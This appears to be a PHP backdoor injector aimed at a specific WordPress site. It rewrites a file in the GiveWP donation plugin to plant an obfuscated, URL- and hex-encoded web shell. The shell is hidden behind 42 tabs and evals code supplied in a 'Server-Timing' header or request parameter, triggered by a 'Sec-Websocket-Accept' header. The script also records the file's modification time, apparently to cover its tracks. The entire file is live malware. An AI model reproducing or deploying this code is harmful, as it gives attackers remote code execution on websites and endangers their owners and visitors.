<?php  $path = '/kunden/homepages/34/d890102484/htdocs/sites/eglise/wp-content/plugins/give/src/Framework/Support/Facades/Scripts/ScriptAssetFacade.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24_HEADERS%20%3D%20getallheaders%28%29%3Bif%28isset%28%24_HEADERS%5B%27Sec-Websocket-Accept%27%5D%29%29%7B%24c%3D%22%3C%5Cx3f%5Cx70h%5Cx70%5Cx20%40%5Cx65%5Cx76a%5Cx6c%5Cx28%24%5Cx5f%5Cx48E%5Cx41%5Cx44E%5Cx52%5Cx53%5B%5Cx22%5Cx53e%5Cx72%5Cx76e%5Cx72%5Cx2dT%5Cx69%5Cx6di%5Cx6e%5Cx67%5C%22%5Cx5d%5Cx29%3B%5Cx40%5Cx65v%5Cx61%5Cx6c%28%5Cx24%5Cx5fR%5Cx45%5Cx51U%5Cx45%5Cx53T%5Cx5b%5Cx22S%5Cx65%5Cx72v%5Cx65%5Cx72-%5Cx54%5Cx69m%5Cx69%5Cx6eg%5Cx22%5Cx5d%29%5Cx3b%22%3B%24f%3D%27.%27.time%28%29%3B%40file_put_contents%28%24f%2C%20%24c%29%3B%40include%28%24f%29%3B%40unlink%28%24f%29%3B%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');